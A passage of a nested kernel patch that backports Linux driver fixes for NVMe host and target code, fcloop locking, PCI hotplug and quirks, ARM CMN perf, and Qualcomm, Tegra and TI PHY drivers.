+-		trace_nvme_async_event(ctrl, aer_type);
+ 		ctrl->aen_result = result;
+ 		break;
+ 	default:
+diff --git a/drivers/nvme/host/trace.h b/drivers/nvme/host/trace.h
+index 6f0eaf6a15282..4fb5922ffdac5 100644
+--- a/drivers/nvme/host/trace.h
++++ b/drivers/nvme/host/trace.h
+@@ -127,15 +127,12 @@ TRACE_EVENT(nvme_async_event,
+ 	),
+ 	TP_printk("nvme%d: NVME_AEN=%#08x [%s]",
+ 		__entry->ctrl_id, __entry->result,
+-		__print_symbolic(__entry->result,
+-		aer_name(NVME_AER_NOTICE_NS_CHANGED),
+-		aer_name(NVME_AER_NOTICE_ANA),
+-		aer_name(NVME_AER_NOTICE_FW_ACT_STARTING),
+-		aer_name(NVME_AER_NOTICE_DISC_CHANGED),
+-		aer_name(NVME_AER_ERROR),
+-		aer_name(NVME_AER_SMART),
+-		aer_name(NVME_AER_CSS),
+-		aer_name(NVME_AER_VS))
++		__print_symbolic(__entry->result & 0x7,
++			aer_name(NVME_AER_ERROR),
++			aer_name(NVME_AER_SMART),
++			aer_name(NVME_AER_NOTICE),
++			aer_name(NVME_AER_CSS),
++			aer_name(NVME_AER_VS))
+ 	)
+ );
+ 
+diff --git a/drivers/nvme/target/admin-cmd.c b/drivers/nvme/target/admin-cmd.c
+index 6a54ed6fb1214..29b73e6581d73 100644
+--- a/drivers/nvme/target/admin-cmd.c
++++ b/drivers/nvme/target/admin-cmd.c
+@@ -685,6 +685,13 @@ static bool nvmet_handle_identify_desclist(struct nvmet_req *req)
+ 	}
+ }
+ 
++static void nvmet_execute_identify_ctrl_nvm(struct nvmet_req *req)
++{
++	/* Not supported: return zeroes */
++	nvmet_req_complete(req,
++		   nvmet_zero_sgl(req, 0, sizeof(struct nvme_id_ctrl_nvm)));
++}
++
+ static void nvmet_execute_identify(struct nvmet_req *req)
+ {
+ 	if (!nvmet_check_transfer_len(req, NVME_IDENTIFY_DATA_SIZE))
+@@ -692,13 +699,8 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 
+ 	switch (req->cmd->identify.cns) {
+ 	case NVME_ID_CNS_NS:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ns(req);
+-		default:
+-			break;
+-		}
+-		break;
++		nvmet_execute_identify_ns(req);
++		return;
+ 	case NVME_ID_CNS_CS_NS:
+ 		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+ 			switch (req->cmd->identify.csi) {
+@@ -710,29 +712,24 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 		}
+ 		break;
+ 	case NVME_ID_CNS_CTRL:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ctrl(req);
+-		}
+-		break;
++		nvmet_execute_identify_ctrl(req);
++		return;
+ 	case NVME_ID_CNS_CS_CTRL:
+-		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+-			switch (req->cmd->identify.csi) {
+-			case NVME_CSI_ZNS:
+-				return nvmet_execute_identify_cns_cs_ctrl(req);
+-			default:
+-				break;
+-			}
+-		}
+-		break;
+-	case NVME_ID_CNS_NS_ACTIVE_LIST:
+ 		switch (req->cmd->identify.csi) {
+ 		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_nslist(req);
+-		default:
++			nvmet_execute_identify_ctrl_nvm(req);
++			return;
++		case NVME_CSI_ZNS:
++			if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
++				nvmet_execute_identify_ctrl_zns(req);
++				return;
++			}
+ 			break;
+ 		}
+ 		break;
++	case NVME_ID_CNS_NS_ACTIVE_LIST:
++		nvmet_execute_identify_nslist(req);
++		return;
+ 	case NVME_ID_CNS_NS_DESC_LIST:
+ 		if (nvmet_handle_identify_desclist(req) == true)
+ 			return;
+diff --git a/drivers/nvme/target/fcloop.c b/drivers/nvme/target/fcloop.c
+index 5c16372f3b533..c780af36c1d4a 100644
+--- a/drivers/nvme/target/fcloop.c
++++ b/drivers/nvme/target/fcloop.c
+@@ -614,10 +614,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, fcp_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq = tfcp_req->fcpreq;
++	unsigned long flags;
+ 	int ret = 0;
+ 	bool aborted = false;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 		tfcp_req->inistate = INI_IO_ACTIVE;
+@@ -626,11 +627,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 		aborted = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(aborted))
+ 		ret = -ECANCELED;
+@@ -655,8 +656,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		container_of(work, struct fcloop_fcpreq, abort_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq;
+ 	bool completed = false;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_ABORTED:
+@@ -665,11 +667,11 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		completed = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(completed)) {
+ 		/* remove reference taken in original abort downcall */
+@@ -681,9 +683,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		nvmet_fc_rcv_fcp_abort(tfcp_req->tport->targetport,
+ 					&tfcp_req->tgt_fcp_req);
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->fcpreq = NULL;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, -ECANCELED);
+ 	/* call_host_done releases reference for abort downcall */
+@@ -699,11 +701,12 @@ fcloop_tgt_fcprqst_done_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, tio_done_work);
+ 	struct nvmefc_fcp_req *fcpreq;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	tfcp_req->inistate = INI_IO_COMPLETED;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, tfcp_req->status);
+ }
+@@ -807,13 +810,14 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 	u32 rsplen = 0, xfrlen = 0;
+ 	int fcp_err = 0, active, aborted;
+ 	u8 op = tgt_fcpreq->op;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	active = tfcp_req->active;
+ 	aborted = tfcp_req->aborted;
+ 	tfcp_req->active = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(active))
+ 		/* illegal - call while i/o active */
+@@ -821,9 +825,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 
+ 	if (unlikely(aborted)) {
+ 		/* target transport has aborted i/o prior */
+-		spin_lock_irq(&tfcp_req->reqlock);
++		spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 		tfcp_req->active = false;
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		tgt_fcpreq->transferred_length = 0;
+ 		tgt_fcpreq->fcp_error = -ECANCELED;
+ 		tgt_fcpreq->done(tgt_fcpreq);
+@@ -880,9 +884,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 		break;
+ 	}
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->active = false;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tgt_fcpreq->transferred_length = xfrlen;
+ 	tgt_fcpreq->fcp_error = fcp_err;
+@@ -896,15 +900,16 @@ fcloop_tgt_fcp_abort(struct nvmet_fc_target_port *tgtport,
+ 			struct nvmefc_tgt_fcp_req *tgt_fcpreq)
+ {
+ 	struct fcloop_fcpreq *tfcp_req = tgt_fcp_req_to_fcpreq(tgt_fcpreq);
++	unsigned long flags;
+ 
+ 	/*
+ 	 * mark aborted only in case there were 2 threads in transport
+ 	 * (one doing io, other doing abort) and only kills ops posted
+ 	 * after the abort request
+ 	 */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->aborted = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tfcp_req->status = NVME_SC_INTERNAL;
+ 
+@@ -946,6 +951,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 	struct fcloop_ini_fcpreq *inireq = fcpreq->private;
+ 	struct fcloop_fcpreq *tfcp_req;
+ 	bool abortio = true;
++	unsigned long flags;
+ 
+ 	spin_lock(&inireq->inilock);
+ 	tfcp_req = inireq->tfcp_req;
+@@ -958,7 +964,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		return;
+ 
+ 	/* break initiator/target relationship for io */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 	case INI_IO_ACTIVE:
+@@ -968,11 +974,11 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		abortio = false;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (abortio)
+ 		/* leave the reference while the work item is scheduled */
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index 89bedfcd974c4..ed3786140965f 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -581,7 +581,7 @@ bool nvmet_ns_revalidate(struct nvmet_ns *ns);
+ u16 blk_to_nvme_status(struct nvmet_req *req, blk_status_t blk_sts);
+ 
+ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns);
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req);
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req);
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_recv(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_send(struct nvmet_req *req);
+diff --git a/drivers/nvme/target/zns.c b/drivers/nvme/target/zns.c
+index 1254cf57e008d..d93ee4ae19454 100644
+--- a/drivers/nvme/target/zns.c
++++ b/drivers/nvme/target/zns.c
+@@ -70,7 +70,7 @@ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns)
+ 	return true;
+ }
+ 
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req)
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req)
+ {
+ 	u8 zasl = req->sq->ctrl->subsys->zasl;
+ 	struct nvmet_ctrl *ctrl = req->sq->ctrl;
+@@ -97,7 +97,7 @@ out:
+ 
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ {
+-	struct nvme_id_ns_zns *id_zns;
++	struct nvme_id_ns_zns *id_zns = NULL;
+ 	u64 zsze;
+ 	u16 status;
+ 	u32 mar, mor;
+@@ -118,16 +118,18 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 	if (status)
+ 		goto done;
+ 
+-	if (!bdev_is_zoned(req->ns->bdev)) {
+-		req->error_loc = offsetof(struct nvme_identify, nsid);
+-		goto done;
+-	}
+-
+ 	if (nvmet_ns_revalidate(req->ns)) {
+ 		mutex_lock(&req->ns->subsys->lock);
+ 		nvmet_ns_changed(req->ns->subsys, req->ns->nsid);
+ 		mutex_unlock(&req->ns->subsys->lock);
+ 	}
++
++	if (!bdev_is_zoned(req->ns->bdev)) {
++		status = NVME_SC_INVALID_FIELD | NVME_SC_DNR;
++		req->error_loc = offsetof(struct nvme_identify, nsid);
++		goto out;
++	}
++
+ 	zsze = (bdev_zone_sectors(req->ns->bdev) << 9) >>
+ 					req->ns->blksize_shift;
+ 	id_zns->lbafe[0].zsze = cpu_to_le64(zsze);
+@@ -148,8 +150,8 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 
+ done:
+ 	status = nvmet_copy_to_sgl(req, 0, id_zns, sizeof(*id_zns));
+-	kfree(id_zns);
+ out:
++	kfree(id_zns);
+ 	nvmet_req_complete(req, status);
+ }
+ 
+diff --git a/drivers/of/device.c b/drivers/of/device.c
+index c674a13c30558..877f50379fab5 100644
+--- a/drivers/of/device.c
++++ b/drivers/of/device.c
+@@ -297,12 +297,15 @@ int of_device_request_module(struct device *dev)
+ 	if (size < 0)
+ 		return size;
+ 
+-	str = kmalloc(size + 1, GFP_KERNEL);
++	/* Reserve an additional byte for the trailing '\0' */
++	size++;
++
++	str = kmalloc(size, GFP_KERNEL);
+ 	if (!str)
+ 		return -ENOMEM;
+ 
+ 	of_device_get_modalias(dev, str, size);
+-	str[size] = '\0';
++	str[size - 1] = '\0';
+ 	ret = request_module(str);
+ 	kfree(str);
+ 
+diff --git a/drivers/pci/controller/dwc/Kconfig b/drivers/pci/controller/dwc/Kconfig
+index 99ec91e2a5cfa..4681eef508899 100644
+--- a/drivers/pci/controller/dwc/Kconfig
++++ b/drivers/pci/controller/dwc/Kconfig
+@@ -286,6 +286,7 @@ config PCIE_KIRIN
+ 	tristate "HiSilicon Kirin series SoCs PCIe controllers"
+ 	depends on PCI_MSI
+ 	select PCIE_DW_HOST
++	select REGMAP_MMIO
+ 	help
+ 	  Say Y here if you want PCIe controller support
+ 	  on HiSilicon Kirin series SoCs.
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 1dde5c579edc8..47db2d20568ef 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -1402,6 +1402,13 @@ DECLARE_PCI_FIXUP_CLASS_HEADER(PCI_VENDOR_ID_SYNOPSYS, 0xabcd,
+ static int __init imx6_pcie_init(void)
+ {
+ #ifdef CONFIG_ARM
++	struct device_node *np;
++
++	np = of_find_matching_node(NULL, imx6_pcie_of_match);
++	if (!np)
++		return -ENODEV;
++	of_node_put(np);
++
+ 	/*
+ 	 * Since probe() can be deferred we need to make sure that
+ 	 * hook_fault_code is not called after __init memory is freed
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 7e23c74fb4230..face42e843968 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1279,11 +1279,9 @@ static int qcom_pcie_init_2_7_0(struct qcom_pcie *pcie)
+ 	val &= ~REQ_NOT_ENTR_L1;
+ 	writel(val, pcie->parf + PCIE20_PARF_PM_CTRL);
+ 
+-	if (IS_ENABLED(CONFIG_PCI_MSI)) {
+-		val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-		val |= BIT(31);
+-		writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-	}
++	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val |= BIT(31);
++	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ err_disable_clocks:
+diff --git a/drivers/pci/hotplug/pciehp_pci.c b/drivers/pci/hotplug/pciehp_pci.c
+index d17f3bf36f709..ad12515a4a121 100644
+--- a/drivers/pci/hotplug/pciehp_pci.c
++++ b/drivers/pci/hotplug/pciehp_pci.c
+@@ -63,7 +63,14 @@ int pciehp_configure_device(struct controller *ctrl)
+ 
+ 	pci_assign_unassigned_bridge_resources(bridge);
+ 	pcie_bus_configure_settings(parent);
++
++	/*
++	 * Release reset_lock during driver binding
++	 * to avoid AB-BA deadlock with device_lock.
++	 */
++	up_read(&ctrl->reset_lock);
+ 	pci_bus_add_devices(parent);
++	down_read_nested(&ctrl->reset_lock, ctrl->depth);
+ 
+  out:
+ 	pci_unlock_rescan_remove();
+@@ -104,7 +111,15 @@ void pciehp_unconfigure_device(struct controller *ctrl, bool presence)
+ 	list_for_each_entry_safe_reverse(dev, temp, &parent->devices,
+ 					 bus_list) {
+ 		pci_dev_get(dev);
++
++		/*
++		 * Release reset_lock during driver unbinding
++		 * to avoid AB-BA deadlock with device_lock.
++		 */
++		up_read(&ctrl->reset_lock);
+ 		pci_stop_and_remove_bus_device(dev);
++		down_read_nested(&ctrl->reset_lock, ctrl->depth);
++
+ 		/*
+ 		 * Ensure that no new Requests will be generated from
+ 		 * the device.
+diff --git a/drivers/pci/pcie/edr.c b/drivers/pci/pcie/edr.c
+index a6b9b479b97ad..87734e4c3c204 100644
+--- a/drivers/pci/pcie/edr.c
++++ b/drivers/pci/pcie/edr.c
+@@ -193,6 +193,7 @@ send_ost:
+ 	 */
+ 	if (estate == PCI_ERS_RESULT_RECOVERED) {
+ 		pci_dbg(edev, "DPC port successfully recovered\n");
++		pcie_clear_device_status(edev);
+ 		acpi_send_edr_status(pdev, edev, EDR_OST_SUCCESS);
+ 	} else {
+ 		pci_dbg(edev, "DPC port recovery failed\n");
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 494fa46f57671..8d32a3834688f 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -1939,6 +1939,19 @@ static void quirk_radeon_pm(struct pci_dev *dev)
+ }
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x6741, quirk_radeon_pm);
+ 
++/*
++ * NVIDIA Ampere-based HDA controllers can wedge the whole device if a bus
++ * reset is performed too soon after transition to D0, extend d3hot_delay
++ * to previous effective default for all NVIDIA HDA controllers.
++ */
++static void quirk_nvidia_hda_pm(struct pci_dev *dev)
++{
++	quirk_d3hot_delay(dev, 20);
++}
++DECLARE_PCI_FIXUP_CLASS_FINAL(PCI_VENDOR_ID_NVIDIA, PCI_ANY_ID,
++			      PCI_CLASS_MULTIMEDIA_HD_AUDIO, 8,
++			      quirk_nvidia_hda_pm);
++
+ /*
+  * Ryzen5/7 XHCI controllers fail upon resume from runtime suspend or s2idle.
+  * https://bugzilla.kernel.org/show_bug.cgi?id=205587
+diff --git a/drivers/perf/amlogic/meson_ddr_pmu_core.c b/drivers/perf/amlogic/meson_ddr_pmu_core.c
+index b84346dbac2ce..0b24dee1ed3cf 100644
+--- a/drivers/perf/amlogic/meson_ddr_pmu_core.c
++++ b/drivers/perf/amlogic/meson_ddr_pmu_core.c
+@@ -156,10 +156,14 @@ static int meson_ddr_perf_event_add(struct perf_event *event, int flags)
+ 	u64 config2 = event->attr.config2;
+ 	int i;
+ 
+-	for_each_set_bit(i, (const unsigned long *)&config1, sizeof(config1))
++	for_each_set_bit(i,
++			 (const unsigned long *)&config1,
++			 BITS_PER_TYPE(config1))
+ 		meson_ddr_set_axi_filter(event, i);
+ 
+-	for_each_set_bit(i, (const unsigned long *)&config2, sizeof(config2))
++	for_each_set_bit(i,
++			 (const unsigned long *)&config2,
++			 BITS_PER_TYPE(config2))
+ 		meson_ddr_set_axi_filter(event, i + 64);
+ 
+ 	if (flags & PERF_EF_START)
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 1deb61b22bc76..ff86075edca48 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -57,14 +57,12 @@
+ #define CMN_INFO_REQ_VC_NUM		GENMASK_ULL(1, 0)
+ 
+ /* XPs also have some local topology info which has uses too */
+-#define CMN_MXP__CONNECT_INFO_P0	0x0008
+-#define CMN_MXP__CONNECT_INFO_P1	0x0010
+-#define CMN_MXP__CONNECT_INFO_P2	0x0028
+-#define CMN_MXP__CONNECT_INFO_P3	0x0030
+-#define CMN_MXP__CONNECT_INFO_P4	0x0038
+-#define CMN_MXP__CONNECT_INFO_P5	0x0040
++#define CMN_MXP__CONNECT_INFO(p)	(0x0008 + 8 * (p))
+ #define CMN__CONNECT_INFO_DEVICE_TYPE	GENMASK_ULL(4, 0)
+ 
++#define CMN_MAX_PORTS			6
++#define CI700_CONNECT_INFO_P2_5_OFFSET	0x10
++
+ /* PMU registers occupy the 3rd 4KB page of each node's region */
+ #define CMN_PMU_OFFSET			0x2000
+ 
+@@ -166,7 +164,7 @@
+ #define CMN_EVENT_BYNODEID(event)	FIELD_GET(CMN_CONFIG_BYNODEID, (event)->attr.config)
+ #define CMN_EVENT_NODEID(event)		FIELD_GET(CMN_CONFIG_NODEID, (event)->attr.config)
+ 
+-#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(27, 24)
++#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(30, 27)
+ #define CMN_CONFIG_WP_DEV_SEL		GENMASK_ULL(50, 48)
+ #define CMN_CONFIG_WP_CHN_SEL		GENMASK_ULL(55, 51)
+ /* Note that we don't yet support the tertiary match group on newer IPs */
+@@ -396,6 +394,25 @@ static struct arm_cmn_node *arm_cmn_node(const struct arm_cmn *cmn,
+ 	return NULL;
+ }
+ 
++static u32 arm_cmn_device_connect_info(const struct arm_cmn *cmn,
++				       const struct arm_cmn_node *xp, int port)
++{
++	int offset = CMN_MXP__CONNECT_INFO(port);
++
++	if (port >= 2) {
++		if (cmn->model & (CMN600 | CMN650))
++			return 0;
++		/*
++		 * CI-700 may have extra ports, but still has the
++		 * mesh_port_connect_info registers in the way.
++		 */
++		if (cmn->model == CI700)
++			offset += CI700_CONNECT_INFO_P2_5_OFFSET;
++	}
++
++	return readl_relaxed(xp->pmu_base - CMN_PMU_OFFSET + offset);
++}
++
+ static struct dentry *arm_cmn_debugfs;
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -469,7 +486,7 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 	y = cmn->mesh_y;
+ 	while (y--) {
+ 		int xp_base = cmn->mesh_x * y;
+-		u8 port[6][CMN_MAX_DIMENSION];
++		u8 port[CMN_MAX_PORTS][CMN_MAX_DIMENSION];
+ 
+ 		for (x = 0; x < cmn->mesh_x; x++)
+ 			seq_puts(s, "--------+");
+@@ -477,14 +494,9 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 		seq_printf(s, "\n%d    |", y);
+ 		for (x = 0; x < cmn->mesh_x; x++) {
+ 			struct arm_cmn_node *xp = cmn->xps + xp_base + x;
+-			void __iomem *base = xp->pmu_base - CMN_PMU_OFFSET;
+-
+-			port[0][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P0);
+-			port[1][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P1);
+-			port[2][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P2);
+-			port[3][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P3);
+-			port[4][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P4);
+-			port[5][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P5);
++
++			for (p = 0; p < CMN_MAX_PORTS; p++)
++				port[p][x] = arm_cmn_device_connect_info(cmn, xp, p);
+ 			seq_printf(s, " XP #%-2d |", xp_base + x);
+ 		}
+ 
+@@ -2082,18 +2094,9 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		 * from this, since in that case we will see at least one XP
+ 		 * with port 2 connected, for the HN-D.
+ 		 */
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P0))
+-			xp_ports |= BIT(0);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P1))
+-			xp_ports |= BIT(1);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P2))
+-			xp_ports |= BIT(2);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P3))
+-			xp_ports |= BIT(3);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P4))
+-			xp_ports |= BIT(4);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P5))
+-			xp_ports |= BIT(5);
++		for (int p = 0; p < CMN_MAX_PORTS; p++)
++			if (arm_cmn_device_connect_info(cmn, xp, p))
++				xp_ports |= BIT(p);
+ 
+ 		if (cmn->multi_dtm && (xp_ports & 0xc))
+ 			arm_cmn_init_dtm(dtm++, xp, 1);
+diff --git a/drivers/perf/riscv_pmu_sbi.c b/drivers/perf/riscv_pmu_sbi.c
+index f6507efe2a584..6f9ca2c42ffe1 100644
+--- a/drivers/perf/riscv_pmu_sbi.c
++++ b/drivers/perf/riscv_pmu_sbi.c
+@@ -883,7 +883,7 @@ static int __init pmu_sbi_devinit(void)
+ 	struct platform_device *pdev;
+ 
+ 	if (sbi_spec_version < sbi_mk_version(0, 3) ||
+-	    sbi_probe_extension(SBI_EXT_PMU) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_PMU)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+index 1b136a87053f8..390380313f760 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+@@ -1854,7 +1854,7 @@ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ };
+ 
+ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+-	.lanes			= 1,
++	.lanes			= 2,
+ 
+ 	.tbls = {
+ 		.serdes		= sc8180x_qmp_pcie_serdes_tbl,
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index ff4b930879f3c..58eeda573b677 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -782,6 +782,7 @@ static int tegra_xusb_add_usb2_port(struct tegra_xusb_padctl *padctl,
+ 	usb2->base.lane = usb2->base.ops->map(&usb2->base);
+ 	if (IS_ERR(usb2->base.lane)) {
+ 		err = PTR_ERR(usb2->base.lane);
++		tegra_xusb_port_unregister(&usb2->base);
+ 		goto out;
+ 	}
+ 
+@@ -848,6 +849,7 @@ static int tegra_xusb_add_ulpi_port(struct tegra_xusb_padctl *padctl,
+ 	ulpi->base.lane = ulpi->base.ops->map(&ulpi->base);
+ 	if (IS_ERR(ulpi->base.lane)) {
+ 		err = PTR_ERR(ulpi->base.lane);
++		tegra_xusb_port_unregister(&ulpi->base);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/phy/ti/phy-j721e-wiz.c b/drivers/phy/ti/phy-j721e-wiz.c
+index ddce5ef7711c6..c21b193fb5498 100644
+--- a/drivers/phy/ti/phy-j721e-wiz.c
++++ b/drivers/phy/ti/phy-j721e-wiz.c
+@@ -430,18 +430,17 @@ static int wiz_mode_select(struct wiz *wiz)
+ 	int i;
+ 
+ 	for (i = 0; i < num_lanes; i++) {
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_DP)
++		if (wiz->lane_phy_type[i] == PHY_TYPE_DP) {
+ 			mode = LANE_MODE_GEN1;
+-		else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII)
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII) {
+ 			mode = LANE_MODE_GEN2;
+-		else
+-			continue;
+-
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
+ 			ret = regmap_field_write(wiz->p0_mac_src_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_rxfclk_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_refclk_sel[i], 0x3);
+ 			mode = LANE_MODE_GEN1;
++		} else {
++			continue;
+ 		}
+ 
